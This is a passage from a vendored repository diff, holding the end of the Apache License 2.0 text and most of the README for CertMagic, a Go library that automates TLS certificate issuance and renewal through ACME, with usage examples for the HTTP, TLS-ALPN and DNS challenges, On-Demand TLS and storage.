"Legal Entity" shall mean the union of the acting entity and all
|
||||
other entities that control, are controlled by, or are under common
|
||||
control with that entity. For the purposes of this definition,
|
||||
"control" means (i) the power, direct or indirect, to cause the
|
||||
direction or management of such entity, whether by contract or
|
||||
otherwise, or (ii) ownership of fifty percent (50%) or more of the
|
||||
outstanding shares, or (iii) beneficial ownership of such entity.
|
||||
|
||||
"You" (or "Your") shall mean an individual or Legal Entity
|
||||
exercising permissions granted by this License.
|
||||
|
||||
"Source" form shall mean the preferred form for making modifications,
|
||||
including but not limited to software source code, documentation
|
||||
source, and configuration files.
|
||||
|
||||
"Object" form shall mean any form resulting from mechanical
|
||||
transformation or translation of a Source form, including but
|
||||
not limited to compiled object code, generated documentation,
|
||||
and conversions to other media types.
|
||||
|
||||
"Work" shall mean the work of authorship, whether in Source or
|
||||
Object form, made available under the License, as indicated by a
|
||||
copyright notice that is included in or attached to the work
|
||||
(an example is provided in the Appendix below).
|
||||
|
||||
"Derivative Works" shall mean any work, whether in Source or Object
|
||||
form, that is based on (or derived from) the Work and for which the
|
||||
editorial revisions, annotations, elaborations, or other modifications
|
||||
represent, as a whole, an original work of authorship. For the purposes
|
||||
of this License, Derivative Works shall not include works that remain
|
||||
separable from, or merely link (or bind by name) to the interfaces of,
|
||||
the Work and Derivative Works thereof.
|
||||
|
||||
"Contribution" shall mean any work of authorship, including
|
||||
the original version of the Work and any modifications or additions
|
||||
to that Work or Derivative Works thereof, that is intentionally
|
||||
submitted to Licensor for inclusion in the Work by the copyright owner
|
||||
or by an individual or Legal Entity authorized to submit on behalf of
|
||||
the copyright owner. For the purposes of this definition, "submitted"
|
||||
means any form of electronic, verbal, or written communication sent
|
||||
to the Licensor or its representatives, including but not limited to
|
||||
communication on electronic mailing lists, source code control systems,
|
||||
and issue tracking systems that are managed by, or on behalf of, the
|
||||
Licensor for the purpose of discussing and improving the Work, but
|
||||
excluding communication that is conspicuously marked or otherwise
|
||||
designated in writing by the copyright owner as "Not a Contribution."
|
||||
|
||||
"Contributor" shall mean Licensor and any individual or Legal Entity
|
||||
on behalf of whom a Contribution has been received by Licensor and
|
||||
subsequently incorporated within the Work.
|
||||
|
||||
2. Grant of Copyright License. Subject to the terms and conditions of
|
||||
this License, each Contributor hereby grants to You a perpetual,
|
||||
worldwide, non-exclusive, no-charge, royalty-free, irrevocable
|
||||
copyright license to reproduce, prepare Derivative Works of,
|
||||
publicly display, publicly perform, sublicense, and distribute the
|
||||
Work and such Derivative Works in Source or Object form.
|
||||
|
||||
3. Grant of Patent License. Subject to the terms and conditions of
|
||||
this License, each Contributor hereby grants to You a perpetual,
|
||||
worldwide, non-exclusive, no-charge, royalty-free, irrevocable
|
||||
(except as stated in this section) patent license to make, have made,
|
||||
use, offer to sell, sell, import, and otherwise transfer the Work,
|
||||
where such license applies only to those patent claims licensable
|
||||
by such Contributor that are necessarily infringed by their
|
||||
Contribution(s) alone or by combination of their Contribution(s)
|
||||
with the Work to which such Contribution(s) was submitted. If You
|
||||
institute patent litigation against any entity (including a
|
||||
cross-claim or counterclaim in a lawsuit) alleging that the Work
|
||||
or a Contribution incorporated within the Work constitutes direct
|
||||
or contributory patent infringement, then any patent licenses
|
||||
granted to You under this License for that Work shall terminate
|
||||
as of the date such litigation is filed.
|
||||
|
||||
4. Redistribution. You may reproduce and distribute copies of the
|
||||
Work or Derivative Works thereof in any medium, with or without
|
||||
modifications, and in Source or Object form, provided that You
|
||||
meet the following conditions:
|
||||
|
||||
(a) You must give any other recipients of the Work or
|
||||
Derivative Works a copy of this License; and
|
||||
|
||||
(b) You must cause any modified files to carry prominent notices
|
||||
stating that You changed the files; and
|
||||
|
||||
(c) You must retain, in the Source form of any Derivative Works
|
||||
that You distribute, all copyright, patent, trademark, and
|
||||
attribution notices from the Source form of the Work,
|
||||
excluding those notices that do not pertain to any part of
|
||||
the Derivative Works; and
|
||||
|
||||
(d) If the Work includes a "NOTICE" text file as part of its
|
||||
distribution, then any Derivative Works that You distribute must
|
||||
include a readable copy of the attribution notices contained
|
||||
within such NOTICE file, excluding those notices that do not
|
||||
pertain to any part of the Derivative Works, in at least one
|
||||
of the following places: within a NOTICE text file distributed
|
||||
as part of the Derivative Works; within the Source form or
|
||||
documentation, if provided along with the Derivative Works; or,
|
||||
within a display generated by the Derivative Works, if and
|
||||
wherever such third-party notices normally appear. The contents
|
||||
of the NOTICE file are for informational purposes only and
|
||||
do not modify the License. You may add Your own attribution
|
||||
notices within Derivative Works that You distribute, alongside
|
||||
or as an addendum to the NOTICE text from the Work, provided
|
||||
that such additional attribution notices cannot be construed
|
||||
as modifying the License.
|
||||
|
||||
You may add Your own copyright statement to Your modifications and
|
||||
may provide additional or different license terms and conditions
|
||||
for use, reproduction, or distribution of Your modifications, or
|
||||
for any such Derivative Works as a whole, provided Your use,
|
||||
reproduction, and distribution of the Work otherwise complies with
|
||||
the conditions stated in this License.
|
||||
|
||||
5. Submission of Contributions. Unless You explicitly state otherwise,
|
||||
any Contribution intentionally submitted for inclusion in the Work
|
||||
by You to the Licensor shall be under the terms and conditions of
|
||||
this License, without any additional terms or conditions.
|
||||
Notwithstanding the above, nothing herein shall supersede or modify
|
||||
the terms of any separate license agreement you may have executed
|
||||
with Licensor regarding such Contributions.
|
||||
|
||||
6. Trademarks. This License does not grant permission to use the trade
|
||||
names, trademarks, service marks, or product names of the Licensor,
|
||||
except as required for reasonable and customary use in describing the
|
||||
origin of the Work and reproducing the content of the NOTICE file.
|
||||
|
||||
7. Disclaimer of Warranty. Unless required by applicable law or
|
||||
agreed to in writing, Licensor provides the Work (and each
|
||||
Contributor provides its Contributions) on an "AS IS" BASIS,
|
||||
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
|
||||
implied, including, without limitation, any warranties or conditions
|
||||
of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A
|
||||
PARTICULAR PURPOSE. You are solely responsible for determining the
|
||||
appropriateness of using or redistributing the Work and assume any
|
||||
risks associated with Your exercise of permissions under this License.
|
||||
|
||||
8. Limitation of Liability. In no event and under no legal theory,
|
||||
whether in tort (including negligence), contract, or otherwise,
|
||||
unless required by applicable law (such as deliberate and grossly
|
||||
negligent acts) or agreed to in writing, shall any Contributor be
|
||||
liable to You for damages, including any direct, indirect, special,
|
||||
incidental, or consequential damages of any character arising as a
|
||||
result of this License or out of the use or inability to use the
|
||||
Work (including but not limited to damages for loss of goodwill,
|
||||
work stoppage, computer failure or malfunction, or any and all
|
||||
other commercial damages or losses), even if such Contributor
|
||||
has been advised of the possibility of such damages.
|
||||
|
||||
9. Accepting Warranty or Additional Liability. While redistributing
|
||||
the Work or Derivative Works thereof, You may choose to offer,
|
||||
and charge a fee for, acceptance of support, warranty, indemnity,
|
||||
or other liability obligations and/or rights consistent with this
|
||||
License. However, in accepting such obligations, You may act only
|
||||
on Your own behalf and on Your sole responsibility, not on behalf
|
||||
of any other Contributor, and only if You agree to indemnify,
|
||||
defend, and hold each Contributor harmless for any liability
|
||||
incurred by, or claims asserted against, such Contributor by reason
|
||||
of your accepting any such warranty or additional liability.
|
||||
|
||||
END OF TERMS AND CONDITIONS
|
||||
|
||||
APPENDIX: How to apply the Apache License to your work.
|
||||
|
||||
To apply the Apache License to your work, attach the following
|
||||
boilerplate notice, with the fields enclosed by brackets "{}"
|
||||
replaced with your own identifying information. (Don't include
|
||||
the brackets!) The text should be enclosed in the appropriate
|
||||
comment syntax for the file format. We also recommend that a
|
||||
file or class name and description of purpose be included on the
|
||||
same "printed page" as the copyright notice for easier
|
||||
identification within third-party archives.
|
||||
|
||||
Copyright {yyyy} {name of copyright owner}
|
||||
|
||||
Licensed under the Apache License, Version 2.0 (the "License");
|
||||
you may not use this file except in compliance with the License.
|
||||
You may obtain a copy of the License at
|
||||
|
||||
http://www.apache.org/licenses/LICENSE-2.0
|
||||
|
||||
Unless required by applicable law or agreed to in writing, software
|
||||
distributed under the License is distributed on an "AS IS" BASIS,
|
||||
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
|
||||
See the License for the specific language governing permissions and
|
||||
limitations under the License.
|
526
vendor/github.com/caddyserver/certmagic/README.md
generated
vendored
Normal file
526
vendor/github.com/caddyserver/certmagic/README.md
generated
vendored
Normal file
@ -0,0 +1,526 @@
|
||||
<p align="center">
|
||||
<a href="https://pkg.go.dev/github.com/caddyserver/certmagic?tab=doc"><img src="https://user-images.githubusercontent.com/1128849/49704830-49d37200-fbd5-11e8-8385-767e0cd033c3.png" alt="CertMagic" width="550"></a>
|
||||
</p>
|
||||
<h3 align="center">Easy and Powerful TLS Automation</h3>
|
||||
<p align="center">The same library used by the <a href="https://caddyserver.com">Caddy Web Server</a></p>
|
||||
<p align="center">
|
||||
<a href="https://pkg.go.dev/github.com/caddyserver/certmagic?tab=doc"><img src="https://img.shields.io/badge/godoc-reference-blue.svg"></a>
|
||||
<a href="https://github.com/caddyserver/certmagic/actions?query=workflow%3ATests"><img src="https://github.com/caddyserver/certmagic/workflows/Tests/badge.svg"></a>
|
||||
<a href="https://sourcegraph.com/github.com/caddyserver/certmagic?badge"><img src="https://sourcegraph.com/github.com/caddyserver/certmagic/-/badge.svg"></a>
|
||||
</p>
|
||||
|
||||
|
||||
Caddy's [automagic TLS features](https://caddyserver.com/docs/automatic-https)—now for your own Go programs—in one powerful and easy-to-use library!
|
||||
|
||||
CertMagic is the most mature, robust, and powerful ACME client integration for Go... and perhaps ever.
|
||||
|
||||
With CertMagic, you can add one line to your Go application to serve securely over TLS, without ever having to touch certificates.
|
||||
|
||||
Instead of:
|
||||
|
||||
```go
|
||||
// plaintext HTTP, gross 🤢
|
||||
http.ListenAndServe(":80", mux)
|
||||
```
|
||||
|
||||
Use CertMagic:
|
||||
|
||||
```go
|
||||
// encrypted HTTPS with HTTP->HTTPS redirects - yay! 🔒😍
|
||||
certmagic.HTTPS([]string{"example.com"}, mux)
|
||||
```
|
||||
|
||||
That line of code will serve your HTTP router `mux` over HTTPS, complete with HTTP->HTTPS redirects. It obtains and renews the TLS certificates. It staples OCSP responses for greater privacy and security. As long as your domain name points to your server, CertMagic will keep its connections secure.
|
||||
|
||||
Compared to other ACME client libraries for Go, only CertMagic supports the full suite of ACME features, and no other library matches CertMagic's maturity and reliability.
|
||||
|
||||
|
||||
|
||||
|
||||
CertMagic - Automatic HTTPS using Let's Encrypt
|
||||
===============================================
|
||||
|
||||
## Menu
|
||||
|
||||
- [Features](#features)
|
||||
- [Requirements](#requirements)
|
||||
- [Installation](#installation)
|
||||
- [Usage](#usage)
|
||||
- [Package Overview](#package-overview)
|
||||
- [Certificate authority](#certificate-authority)
|
||||
- [The `Config` type](#the-config-type)
|
||||
- [Defaults](#defaults)
|
||||
- [Providing an email address](#providing-an-email-address)
|
||||
- [Rate limiting](#rate-limiting)
|
||||
- [Development and testing](#development-and-testing)
|
||||
- [Examples](#examples)
|
||||
- [Serving HTTP handlers with HTTPS](#serving-http-handlers-with-https)
|
||||
- [Starting a TLS listener](#starting-a-tls-listener)
|
||||
- [Getting a tls.Config](#getting-a-tlsconfig)
|
||||
- [Advanced use](#advanced-use)
|
||||
- [Wildcard Certificates](#wildcard-certificates)
|
||||
- [Behind a load balancer (or in a cluster)](#behind-a-load-balancer-or-in-a-cluster)
|
||||
- [The ACME Challenges](#the-acme-challenges)
|
||||
- [HTTP Challenge](#http-challenge)
|
||||
- [TLS-ALPN Challenge](#tls-alpn-challenge)
|
||||
- [DNS Challenge](#dns-challenge)
|
||||
- [On-Demand TLS](#on-demand-tls)
|
||||
- [Storage](#storage)
|
||||
- [Cache](#cache)
|
||||
- [Contributing](#contributing)
|
||||
- [Project History](#project-history)
|
||||
- [Credits and License](#credits-and-license)
|
||||
|
||||
|
||||
## Features
|
||||
|
||||
- Fully automated certificate management including issuance and renewal
|
||||
- One-liner, fully managed HTTPS servers
|
||||
- Full control over almost every aspect of the system
|
||||
- HTTP->HTTPS redirects
|
||||
- Solves all 3 ACME challenges: HTTP, TLS-ALPN, and DNS
|
||||
- Most robust error handling of _any_ ACME client
|
||||
- Challenges are randomized to avoid accidental dependence
|
||||
- Challenges are rotated to overcome certain network blockages
|
||||
- Robust retries for up to 30 days
|
||||
- Exponential backoff with carefully-tuned intervals
|
||||
- Retries with optional test/staging CA endpoint instead of production, to avoid rate limits
|
||||
- Written in Go, a language with memory-safety guarantees
|
||||
- Powered by [ACMEz](https://github.com/mholt/acmez), _the_ premier ACME client library for Go
|
||||
- All [libdns](https://github.com/libdns) DNS providers work out-of-the-box
|
||||
- Pluggable storage implementations (default: file system)
|
||||
- Wildcard certificates
|
||||
- Automatic OCSP stapling ([done right](https://gist.github.com/sleevi/5efe9ef98961ecfb4da8#gistcomment-2336055)) [keeps your sites online!](https://twitter.com/caddyserver/status/1234874273724084226)
|
||||
- Will [automatically attempt](https://twitter.com/mholt6/status/1235577699541762048) to replace [revoked certificates](https://community.letsencrypt.org/t/2020-02-29-caa-rechecking-bug/114591/3?u=mholt)!
|
||||
- Staples stored to disk in case of responder outages
|
||||
- Distributed solving of all challenges (works behind load balancers)
|
||||
- Highly efficient, coordinated management in a fleet
|
||||
- Active locking
|
||||
- Smart queueing
|
||||
- Supports "on-demand" issuance of certificates (during TLS handshakes!)
|
||||
- Caddy / CertMagic pioneered this technology
|
||||
- Custom decision functions to regulate and throttle on-demand behavior
|
||||
- Optional event hooks for observation
|
||||
- Works with any certificate authority (CA) compliant with the ACME specification
|
||||
- Certificate revocation (please, only if private key is compromised)
|
||||
- Must-Staple (optional; not default)
|
||||
- Cross-platform support! Mac, Windows, Linux, BSD, Android...
|
||||
- Scales to hundreds of thousands of names/certificates per instance
|
||||
- Use in conjunction with your own certificates
|
||||
|
||||
|
||||
## Requirements
|
||||
|
||||
0. ACME server (can be a publicly-trusted CA, or your own)
|
||||
1. Public DNS name(s) you control
|
||||
2. Server reachable from public Internet
|
||||
- Or use the DNS challenge to waive this requirement
|
||||
3. Control over port 80 (HTTP) and/or 443 (HTTPS)
|
||||
- Or they can be forwarded to other ports you control
|
||||
- Or use the DNS challenge to waive this requirement
|
||||
- (This is a requirement of the ACME protocol, not a library limitation)
|
||||
4. Persistent storage
|
||||
- Typically the local file system (default)
|
||||
- Other integrations available/possible
|
||||
|
||||
**_Before using this library, your domain names MUST be pointed (A/AAAA records) at your server (unless you use the DNS challenge)!_**
|
||||
|
||||
|
||||
## Installation
|
||||
|
||||
```bash
|
||||
$ go get github.com/caddyserver/certmagic
|
||||
```
|
||||
|
||||
|
||||
## Usage
|
||||
|
||||
### Package Overview
|
||||
|
||||
#### Certificate authority
|
||||
|
||||
This library uses Let's Encrypt by default, but you can use any certificate authority that conforms to the ACME specification. Known/common CAs are provided as consts in the package, for example `LetsEncryptStagingCA` and `LetsEncryptProductionCA`.
|
||||
|
||||
#### The `Config` type
|
||||
|
||||
The `certmagic.Config` struct is how you can wield the power of this fully armed and operational battle station. However, an empty/uninitialized `Config` is _not_ a valid one! In time, you will learn to use the force of `certmagic.NewDefault()` as I have.
|
||||
|
||||
#### Defaults
|
||||
|
||||
The default `Config` value is called `certmagic.Default`. Change its fields to suit your needs, then call `certmagic.NewDefault()` when you need a valid `Config` value. In other words, `certmagic.Default` is a template and is not valid for use directly.
|
||||
|
||||
You can set the default values easily, for example: `certmagic.Default.Issuer = ...`.
|
||||
|
||||
Similarly, to configure ACME-specific defaults, use `certmagic.DefaultACME`.
|
||||
|
||||
The high-level functions in this package (`HTTPS()`, `Listen()`, `ManageSync()`, and `ManageAsync()`) use the default config exclusively. This is how most of you will interact with the package. This is suitable when all your certificates are managed the same way. However, if you need to manage certificates differently depending on their name, you will need to make your own cache and configs (keep reading).
|
||||
|
||||
|
||||
#### Providing an email address
|
||||
|
||||
Although not strictly required, this is highly recommended best practice. It allows you to receive expiration emails if your certificates are expiring for some reason, and also allows the CA's engineers to potentially get in touch with you if something is wrong. I recommend setting `certmagic.DefaultACME.Email` or always setting the `Email` field of a new `Config` struct.
|
||||
|
||||
|
||||
#### Rate limiting
|
||||
|
||||
To avoid firehosing the CA's servers, CertMagic has built-in rate limiting. Currently, its default limit is up to 10 transactions (obtain or renew) every 1 minute (sliding window). This can be changed by setting the `RateLimitEvents` and `RateLimitEventsWindow` variables, if desired.
|
||||
|
||||
The CA may still enforce their own rate limits, and there's nothing (well, nothing ethical) CertMagic can do to bypass them for you.
|
||||
|
||||
Additionally, CertMagic will retry failed validations with exponential backoff for up to 30 days, with a reasonable maximum interval between attempts (an "attempt" means trying each enabled challenge type once).
|
||||
|
||||
|
||||
### Development and Testing
|
||||
|
||||
Note that Let's Encrypt imposes [strict rate limits](https://letsencrypt.org/docs/rate-limits/) at its production endpoint, so using it while developing your application may lock you out for a few days if you aren't careful!
|
||||
|
||||
While developing your application and testing it, use [their staging endpoint](https://letsencrypt.org/docs/staging-environment/) which has much higher rate limits. Even then, don't hammer it: but it's much safer for when you're testing. When deploying, though, use their production CA because their staging CA doesn't issue trusted certificates.
|
||||
|
||||
To use staging, set `certmagic.DefaultACME.CA = certmagic.LetsEncryptStagingCA` or set `CA` of every `ACMEIssuer` struct.
|
||||
|
||||
|
||||
|
||||
### Examples
|
||||
|
||||
There are many ways to use this library. We'll start with the highest-level (simplest) and work down (more control).
|
||||
|
||||
All these high-level examples use `certmagic.Default` and `certmagic.DefaultACME` for the config and the default cache and storage for serving up certificates.
|
||||
|
||||
First, we'll follow best practices and do the following:
|
||||
|
||||
```go
|
||||
// read and agree to your CA's legal documents
|
||||
certmagic.DefaultACME.Agreed = true
|
||||
|
||||
// provide an email address
|
||||
certmagic.DefaultACME.Email = "you@yours.com"
|
||||
|
||||
// use the staging endpoint while we're developing
|
||||
certmagic.DefaultACME.CA = certmagic.LetsEncryptStagingCA
|
||||
```
|
||||
|
||||
For fully-functional program examples, check out [this Twitter thread](https://twitter.com/mholt6/status/1073103805112147968) (or read it [unrolled into a single post](https://threadreaderapp.com/thread/1073103805112147968.html)). (Note that the package API has changed slightly since these posts.)
|
||||
|
||||
|
||||
#### Serving HTTP handlers with HTTPS
|
||||
|
||||
```go
|
||||
err := certmagic.HTTPS([]string{"example.com", "www.example.com"}, mux)
|
||||
if err != nil {
|
||||
return err
|
||||
}
|
||||
```
|
||||
|
||||
This starts HTTP and HTTPS listeners and redirects HTTP to HTTPS!
|
||||
|
||||
#### Starting a TLS listener
|
||||
|
||||
```go
|
||||
ln, err := certmagic.Listen([]string{"example.com"})
|
||||
if err != nil {
|
||||
return err
|
||||
}
|
||||
```
|
||||
|
||||
|
||||
#### Getting a tls.Config
|
||||
|
||||
```go
|
||||
tlsConfig, err := certmagic.TLS([]string{"example.com"})
|
||||
if err != nil {
|
||||
return err
|
||||
}
|
||||
```
|
||||
|
||||
|
||||
#### Advanced use
|
||||
|
||||
For more control (particularly, if you need a different way of managing each certificate), you'll make and use a `Cache` and a `Config` like so:
|
||||
|
||||
```go
|
||||
cache := certmagic.NewCache(certmagic.CacheOptions{
|
||||
GetConfigForCert: func(cert certmagic.Certificate) (*certmagic.Config, error) {
|
||||
// do whatever you need to do to get the right
|
||||
// configuration for this certificate; keep in
|
||||
// mind that this config value is used as a
|
||||
// template, and will be completed with any
|
||||
// defaults that are set in the Default config
|
||||
return &certmagic.Config{
|
||||
// ...
|
||||
}, nil
|
||||
},
|
||||
...
|
||||
})
|
||||
|
||||
magic := certmagic.New(cache, certmagic.Config{
|
||||
// any customizations you need go here
|
||||
})
|
||||
|
||||
myACME := certmagic.NewACMEIssuer(magic, certmagic.ACMEIssuer{
|
||||
CA: certmagic.LetsEncryptStagingCA,
|
||||
Email: "you@yours.com",
|
||||
Agreed: true,
|
||||
// plus any other customizations you need
|
||||
})
|
||||
|
||||
magic.Issuer = myACME
|
||||
|
||||
// this obtains certificates or renews them if necessary
|
||||
err := magic.ManageSync(context.TODO(), []string{"example.com", "sub.example.com"})
|
||||
if err != nil {
|
||||
return err
|
||||
}
|
||||
|
||||
// to use its certificates and solve the TLS-ALPN challenge,
|
||||
// you can get a TLS config to use in a TLS listener!
|
||||
tlsConfig := magic.TLSConfig()
|
||||
|
||||
// be sure to customize NextProtos if serving a specific
|
||||
// application protocol after the TLS handshake, for example:
|
||||
tlsConfig.NextProtos = append([]string{"h2", "http/1.1"}, tlsConfig.NextProtos...)
|
||||
|
||||
//// OR ////
|
||||
|
||||
// if you already have a TLS config you don't want to replace,
|
||||
// we can simply set its GetCertificate field and append the
|
||||
// TLS-ALPN challenge protocol to the NextProtos
|
||||
myTLSConfig.GetCertificate = magic.GetCertificate
|
||||
myTLSConfig.NextProtos = append(myTLSConfig.NextProtos, tlsalpn01.ACMETLS1Protocol)
|
||||
|
||||
// the HTTP challenge has to be handled by your HTTP server;
|
||||
// if you don't have one, you should have disabled it earlier
|
||||
// when you made the certmagic.Config
|
||||
httpMux = myACME.HTTPChallengeHandler(httpMux)
|
||||
```
|
||||
|
||||
Great! This example grants you much more flexibility for advanced programs. However, _the vast majority of you will only use the high-level functions described earlier_, especially since you can still customize them by setting the package-level `Default` config.
|
||||
|
||||
|
||||
### Wildcard certificates
|
||||
|
||||
At time of writing (December 2018), Let's Encrypt only issues wildcard certificates with the DNS challenge. You can easily enable the DNS challenge with CertMagic for numerous providers (see the relevant section in the docs).
|
||||
|
||||
|
||||
### Behind a load balancer (or in a cluster)
|
||||
|
||||
CertMagic runs effectively behind load balancers and/or in cluster/fleet environments. In other words, you can have 10 or 1,000 servers all serving the same domain names, all sharing certificates and OCSP staples.
|
||||
|
||||
To do so, simply ensure that each instance is using the same Storage. That is the sole criteria for determining whether an instance is part of a cluster.
|
||||
|
||||
The default Storage is implemented using the file system, so mounting the same shared folder is sufficient (see [Storage](#storage) for more on that)! If you need an alternate Storage implementation, feel free to use one, provided that all the instances use the _same_ one. :)
|
||||
|
||||
See [Storage](#storage) and the associated [pkg.go.dev](https://pkg.go.dev/github.com/caddyserver/certmagic?tab=doc#Storage) for more information!
|
||||
|
||||
|
||||
## The ACME Challenges
|
||||
|
||||
This section describes how to solve the ACME challenges. Challenges are how you demonstrate to the certificate authority some control over your domain name, thus authorizing them to grant you a certificate for that name. [The great innovation of ACME](https://www.dotconferences.com/2016/10/matthew-holt-go-with-acme) is that verification by CAs can now be automated, rather than having to click links in emails (who ever thought that was a good idea??).
|
||||
|
||||
If you're using the high-level convenience functions like `HTTPS()`, `Listen()`, or `TLS()`, the HTTP and/or TLS-ALPN challenges are solved for you because they also start listeners. However, if you're making a `Config` and you start your own server manually, you'll need to be sure the ACME challenges can be solved so certificates can be renewed.
|
||||
|
||||
The HTTP and TLS-ALPN challenges are the defaults because they don't require configuration from you, but they require that your server is accessible from external IPs on low ports. If that is not possible in your situation, you can enable the DNS challenge, which will disable the HTTP and TLS-ALPN challenges and use the DNS challenge exclusively.
|
||||
|
||||
Technically, only one challenge needs to be enabled for things to work, but using multiple is good for reliability in case a challenge is discontinued by the CA. This happened to the TLS-SNI challenge in early 2018—many popular ACME clients such as Traefik and Autocert broke, resulting in downtime for some sites, until new releases were made and patches deployed, because they used only one challenge; Caddy, however—this library's forerunner—was unaffected because it also used the HTTP challenge. If multiple challenges are enabled, they are chosen randomly to help prevent false reliance on a single challenge type. And if one fails, any remaining enabled challenges are tried before giving up.
|
||||
|
||||
|
||||
### HTTP Challenge
|
||||
|
||||
Per the ACME spec, the HTTP challenge requires port 80, or at least packet forwarding from port 80. It works by serving a specific HTTP response that only the genuine server would have to a normal HTTP request at a special endpoint.
|
||||
|
||||
If you are running an HTTP server, solving this challenge is very easy: just wrap your handler in `HTTPChallengeHandler` _or_ call `SolveHTTPChallenge()` inside your own `ServeHTTP()` method.
|
||||
|
||||
For example, if you're using the standard library:
|
||||
|
||||
```go
|
||||
mux := http.NewServeMux()
|
||||
mux.HandleFunc("/", func(w http.ResponseWriter, req *http.Request) {
|
||||
fmt.Fprintf(w, "Lookit my cool website over HTTPS!")
|
||||
})
|
||||
|
||||
http.ListenAndServe(":80", myACME.HTTPChallengeHandler(mux))
|
||||
```
|
||||
|
||||
If wrapping your handler is not a good solution, try this inside your `ServeHTTP()` instead:
|
||||
|
||||
```go
|
||||
magic := certmagic.NewDefault()
|
||||
myACME := certmagic.NewACMEIssuer(magic, certmagic.DefaultACME)
|
||||
|
||||
func ServeHTTP(w http.ResponseWriter, req *http.Request) {
|
||||
if myACME.HandleHTTPChallenge(w, r) {
|
||||
return // challenge handled; nothing else to do
|
||||
}
|
||||
...
|
||||
}
|
||||
```
|
||||
|
||||
If you are not running an HTTP server, you should disable the HTTP challenge _or_ run an HTTP server whose sole job it is to solve the HTTP challenge.
|
||||
|
||||
|
||||
### TLS-ALPN Challenge
|
||||
|
||||
Per the ACME spec, the TLS-ALPN challenge requires port 443, or at least packet forwarding from port 443. It works by providing a special certificate using a standard TLS extension, Application Layer Protocol Negotiation (ALPN), having a special value. This is the most convenient challenge type because it usually requires no extra configuration and uses the standard TLS port which is where the certificates are used, also.
|
||||
|
||||
This challenge is easy to solve: just use the provided `tls.Config` when you make your TLS listener:
|
||||
|
||||
```go
|
||||
// use this to configure a TLS listener
|
||||
tlsConfig := magic.TLSConfig()
|
||||
```
|
||||
|
||||
Or make two simple changes to an existing `tls.Config`:
|
||||
|
||||
```go
|
||||
myTLSConfig.GetCertificate = magic.GetCertificate
|
||||
myTLSConfig.NextProtos = append(myTLSConfig.NextProtos, tlsalpn01.ACMETLS1Protocol}
|
||||
```
|
||||
|
||||
Then just make sure your TLS listener is listening on port 443:
|
||||
|
||||
```go
|
||||
ln, err := tls.Listen("tcp", ":443", myTLSConfig)
|
||||
```
|
||||
|
||||
|
||||
### DNS Challenge
|
||||
|
||||
The DNS challenge is perhaps the most useful challenge because it allows you to obtain certificates without your server needing to be publicly accessible on the Internet, and it's the only challenge by which Let's Encrypt will issue wildcard certificates.
|
||||
|
||||
This challenge works by setting a special record in the domain's zone. To do this automatically, your DNS provider needs to offer an API by which changes can be made to domain names, and the changes need to take effect immediately for best results. CertMagic supports [all DNS providers with `libdns` implementations](https://github.com/libdns)! It always cleans up the temporary record after the challenge completes.
|
||||
|
||||
To enable it, just set the `DNS01Solver` field on a `certmagic.ACMEIssuer` struct, or set the default `certmagic.ACMEIssuer.DNS01Solver` variable. For example, if my domains' DNS was served by Cloudflare:
|
||||
|
||||
```go
|
||||
import "github.com/libdns/cloudflare"
|
||||
|
||||
certmagic.DefaultACME.DNS01Solver = &certmagic.DNS01Solver{
|
||||
DNSProvider: &cloudflare.Provider{
|
||||
APIToken: "topsecret",
|
||||
},
|
||||
}
|
||||
```
|
||||
|
||||
Now the DNS challenge will be used by default, and I can obtain certificates for wildcard domains, too. Enabling the DNS challenge disables the other challenges for that `certmagic.ACMEIssuer` instance.
|
||||
|
||||
|
||||
## On-Demand TLS
|
||||
|
||||
Normally, certificates are obtained and renewed before a listener starts serving, and then those certificates are maintained throughout the lifetime of the program. In other words, the certificate names are static. But sometimes you don't know all the names ahead of time, or you don't want to manage all the certificates up front. This is where On-Demand TLS shines.
|
||||
|
||||
Originally invented for use in Caddy (which was the first program to use such technology), On-Demand TLS makes it possible and easy to serve certificates for arbitrary or specific names during the lifetime of the server. When a TLS handshake is received, CertMagic will read the Server Name Indication (SNI) value and either load and present that certificate in the ServerHello, or if one does not exist, it will obtain it from a CA right then-and-there.
|
||||
|
||||
Of course, this has some obvious security implications. You don't want to DoS a CA or allow arbitrary clients to fill your storage with spammy TLS handshakes. That's why, when you enable On-Demand issuance, you should set limits or policy to allow getting certificates. CertMagic has an implicit whitelist built-in which is sufficient for nearly everyone, but also has a more advanced way to control on-demand issuance.
|
||||
|
||||
The simplest way to enable on-demand issuance is to set the OnDemand field of a Config (or the default package-level value):
|
||||
|
||||
```go
|
||||
certmagic.Default.OnDemand = new(certmagic.OnDemandConfig)
|
||||
```
|
||||
|
||||
By setting this to a non-nil value, on-demand TLS is enabled for that config. For convenient security, CertMagic's high-level abstraction functions such as `HTTPS()`, `TLS()`, `ManageSync()`, `ManageAsync()`, and `Listen()` (which all accept a list of domain names) will whitelist those names automatically so only certificates for those names can be obtained when using the Default config. Usually this is sufficient for most users.
|
||||
|
||||
However, if you require advanced control over which domains can be issued certificates on-demand (for example, if you do not know which domain names you are managing, or just need to defer their operations until later), you should implement your own DecisionFunc:
|
||||
|
||||
```go
|
||||
// if the decision function returns an error, a certificate
|
||||
// may not be obtained for that name at that time
|
||||
certmagic.Default.OnDemand = &certmagic.OnDemandConfig{
|
||||
DecisionFunc: func(name string) error {
|
||||
if name != "example.com" {
|
||||
return fmt.Errorf("not allowed")
|
||||
}
|
||||
return nil
|
||||
},
|
||||
}
|
||||
```
|
||||
|
||||
The [pkg.go.dev](https://pkg.go.dev/github.com/caddyserver/certmagic?tab=doc#OnDemandConfig) describes how to use this in full detail, so please check it out!
|
||||
|
||||
|
||||
## Storage
|
||||
|
||||
CertMagic relies on storage to store certificates and other TLS assets (OCSP staple cache, coordinating locks, etc). Persistent storage is a requirement when using CertMagic: ephemeral storage will likely lead to rate limiting on the CA-side as CertMagic will always have to get new certificates.
|
||||
|
||||
By default, CertMagic stores assets on the local file system in `$HOME/.local/share/certmagic` (and honors `$XDG_DATA_HOME` if set). CertMagic will create the directory if it does not exist. If writes are denied, things will not be happy, so make sure CertMagic can write to it!
|
||||
|
||||
The notion of a "cluster" or "fleet" of instances that may be serving the same site and sharing certificates, etc, is tied to storage. Simply, any instances that use the same storage facilities are considered part of the cluster. So if you deploy 100 instances of CertMagic behind a load balancer, they are all part of the same cluster if they share the same storage configuration. Sharing storage could be mounting a shared folder, or implementing some other distributed storage system such as a database server or KV store.
|
||||
|
||||
